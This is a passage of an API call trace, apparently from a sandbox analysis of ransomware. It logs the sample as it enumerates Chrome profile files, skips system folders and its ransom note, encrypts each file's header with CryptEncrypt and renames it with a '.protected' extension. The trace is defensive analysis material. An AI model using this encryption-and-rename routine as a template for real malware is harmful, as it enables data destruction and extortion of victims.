liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.086] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0084.087] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.087] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0084.087] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0084.087] CloseHandle (hObject=0x154) returned 1 [0084.088] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Favicons.protected") returned 98 [0084.088] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Favicons" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\favicons"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Favicons.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\favicons.protected")) returned 1 [0084.089] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.089] lstrcmpiW (lpString1="Favicons-journal", lpString2="Windows") returned -1 [0084.089] lstrcmpiW (lpString1="Favicons-journal", lpString2="Program Files") returned -1 [0084.089] lstrcmpiW (lpString1="Favicons-journal", lpString2="Program Files (x86)") returned -1 [0084.089] lstrcmpiW (lpString1="Favicons-journal", lpString2="$Recycle.bin") returned 1 [0084.089] lstrcmpiW (lpString1="Favicons-journal", lpString2="System Volume Information") returned -1 [0084.089] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Favicons-journal") returned 96 [0084.089] StrStrIW (lpFirst="Favicons-journal", lpSrch=".protected") returned 0x0 [0084.089] lstrcmpW (lpString1="Favicons-journal", lpString2="RESTORE_FILES.txt") returned -1 [0084.089] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.089] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.089] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Favicons-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\favicons-journal"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.090] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Favicons-journal") returned 96 [0084.090] StrStrW (lpFirst="Favicons-journal", lpSrch=".txt") returned 0x0 [0084.090] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Favicons-journal") returned 96 [0084.090] StrStrW (lpFirst="Favicons-journal", lpSrch=".rar") returned 0x0 [0084.090] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Favicons-journal") returned 96 [0084.090] StrStrW (lpFirst="Favicons-journal", lpSrch=".zip") returned 0x0 [0084.090] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x0, lpOverlapped=0x0) returned 1 [0084.090] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.090] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x0, lpOverlapped=0x0) returned 1 [0084.090] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.090] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0084.091] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0084.091] CloseHandle (hObject=0x154) returned 1 [0084.092] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Favicons-journal.protected") returned 106 [0084.092] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Favicons-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\favicons-journal"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Favicons-journal.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\favicons-journal.protected")) returned 1 [0084.092] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.092] lstrcmpiW (lpString1="Google Profile.ico", lpString2="Windows") returned -1 [0084.092] lstrcmpiW (lpString1="Google Profile.ico", lpString2="Program Files") returned -1 [0084.092] lstrcmpiW (lpString1="Google Profile.ico", lpString2="Program Files (x86)") returned -1 [0084.092] lstrcmpiW (lpString1="Google Profile.ico", lpString2="$Recycle.bin") returned 1 [0084.092] lstrcmpiW (lpString1="Google Profile.ico", lpString2="System Volume Information") returned -1 [0084.092] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Google Profile.ico") returned 98 [0084.092] StrStrIW (lpFirst="Google Profile.ico", lpSrch=".protected") returned 0x0 [0084.092] lstrcmpW (lpString1="Google Profile.ico", lpString2="RESTORE_FILES.txt") returned -1 [0084.092] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.093] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.093] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Google Profile.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\google profile.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.093] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Google Profile.ico") returned 98 [0084.093] StrStrW (lpFirst="Google Profile.ico", lpSrch=".txt") returned 0x0 [0084.093] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Google Profile.ico") returned 98 [0084.093] StrStrW (lpFirst="Google Profile.ico", lpSrch=".rar") returned 0x0 [0084.093] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Google Profile.ico") returned 98 [0084.093] StrStrW (lpFirst="Google Profile.ico", lpSrch=".zip") returned 0x0 [0084.093] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0084.102] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.102] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0084.103] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.103] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0084.104] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0084.104] CloseHandle (hObject=0x154) returned 1 [0084.105] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Google Profile.ico.protected") returned 108 [0084.105] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Google Profile.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\google profile.ico"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Google Profile.ico.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\google profile.ico.protected")) returned 1 [0084.105] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.105] lstrcmpiW (lpString1="History", lpString2="Windows") returned -1 [0084.105] lstrcmpiW (lpString1="History", lpString2="Program Files") returned -1 [0084.106] lstrcmpiW (lpString1="History", lpString2="Program Files (x86)") returned -1 [0084.106] lstrcmpiW (lpString1="History", lpString2="$Recycle.bin") returned 1 [0084.106] lstrcmpiW (lpString1="History", lpString2="System Volume Information") returned -1 [0084.106] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History") returned 87 [0084.106] StrStrIW (lpFirst="History", lpSrch=".protected") returned 0x0 [0084.106] lstrcmpW (lpString1="History", lpString2="RESTORE_FILES.txt") returned -1 [0084.106] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.106] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.106] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\history"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.107] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History") returned 87 [0084.107] StrStrW (lpFirst="History", lpSrch=".txt") returned 0x0 [0084.107] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History") returned 87 [0084.107] StrStrW (lpFirst="History", lpSrch=".rar") returned 0x0 [0084.107] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History") returned 87 [0084.107] StrStrW (lpFirst="History", lpSrch=".zip") returned 0x0 [0084.107] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0084.116] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.116] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0084.117] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.117] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0084.118] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0084.118] CloseHandle (hObject=0x154) returned 1 [0084.118] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History.protected") returned 97 [0084.118] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\history"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\history.protected")) returned 1 [0084.119] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.119] lstrcmpiW (lpString1="History Provider Cache", lpString2="Windows") returned -1 [0084.119] lstrcmpiW (lpString1="History Provider Cache", lpString2="Program Files") returned -1 [0084.119] lstrcmpiW (lpString1="History Provider Cache", lpString2="Program Files (x86)") returned -1 [0084.119] lstrcmpiW (lpString1="History Provider Cache", lpString2="$Recycle.bin") returned 1 [0084.119] lstrcmpiW (lpString1="History Provider Cache", lpString2="System Volume Information") returned -1 [0084.119] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History Provider Cache") returned 102 [0084.119] StrStrIW (lpFirst="History Provider Cache", lpSrch=".protected") returned 0x0 [0084.119] lstrcmpW (lpString1="History Provider Cache", lpString2="RESTORE_FILES.txt") returned -1 [0084.119] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.119] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.120] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History Provider Cache" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\history provider cache"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.120] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History Provider Cache") returned 102 [0084.120] StrStrW (lpFirst="History Provider Cache", lpSrch=".txt") returned 0x0 [0084.120] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History Provider Cache") returned 102 [0084.120] StrStrW (lpFirst="History Provider Cache", lpSrch=".rar") returned 0x0 [0084.120] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History Provider Cache") returned 102 [0084.120] StrStrW (lpFirst="History Provider Cache", lpSrch=".zip") returned 0x0 [0084.120] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x142f, lpOverlapped=0x0) returned 1 [0084.121] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffebd1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.122] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x142f, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x142f, lpOverlapped=0x0) returned 1 [0084.122] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.122] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0084.122] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0084.123] CloseHandle (hObject=0x154) returned 1 [0084.123] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History Provider Cache.protected") returned 112 [0084.123] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History Provider Cache" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\history provider cache"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History Provider Cache.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\history provider cache.protected")) returned 1 [0084.124] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.124] lstrcmpiW (lpString1="History-journal", lpString2="Windows") returned -1 [0084.124] lstrcmpiW (lpString1="History-journal", lpString2="Program Files") returned -1 [0084.124] lstrcmpiW (lpString1="History-journal", lpString2="Program Files (x86)") returned -1 [0084.124] lstrcmpiW (lpString1="History-journal", lpString2="$Recycle.bin") returned 1 [0084.124] lstrcmpiW (lpString1="History-journal", lpString2="System Volume Information") returned -1 [0084.124] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History-journal") returned 95 [0084.124] StrStrIW (lpFirst="History-journal", lpSrch=".protected") returned 0x0 [0084.124] lstrcmpW (lpString1="History-journal", lpString2="RESTORE_FILES.txt") returned -1 [0084.124] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.124] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.124] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\history-journal"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.125] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History-journal") returned 95 [0084.125] StrStrW (lpFirst="History-journal", lpSrch=".txt") returned 0x0 [0084.125] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History-journal") returned 95 [0084.125] StrStrW (lpFirst="History-journal", lpSrch=".rar") returned 0x0 [0084.125] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History-journal") returned 95 [0084.125] StrStrW (lpFirst="History-journal", lpSrch=".zip") returned 0x0 [0084.125] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x0, lpOverlapped=0x0) returned 1 [0084.125] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.125] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x0, lpOverlapped=0x0) returned 1 [0084.126] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.126] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0084.126] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0084.126] CloseHandle (hObject=0x154) returned 1 [0084.127] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History-journal.protected") returned 105 [0084.127] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\history-journal"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History-journal.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\history-journal.protected")) returned 1 [0084.128] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.128] lstrcmpiW (lpString1="JumpListIcons", lpString2="Windows") returned -1 [0084.128] lstrcmpiW (lpString1="JumpListIcons", lpString2="Program Files") returned -1 [0084.128] lstrcmpiW (lpString1="JumpListIcons", lpString2="Program Files (x86)") returned -1 [0084.128] lstrcmpiW (lpString1="JumpListIcons", lpString2="$Recycle.bin") returned 1 [0084.128] lstrcmpiW (lpString1="JumpListIcons", lpString2="System Volume Information") returned -1 [0084.128] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIcons") returned 93 [0084.128] lstrcmpW (lpString1="JumpListIcons", lpString2=".") returned 1 [0084.128] lstrcmpW (lpString1="JumpListIcons", lpString2="..") returned 1 [0084.128] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIcons\\*") returned 95 [0084.128] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIcons\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0084.128] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.128] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.128] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.128] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.128] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.128] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 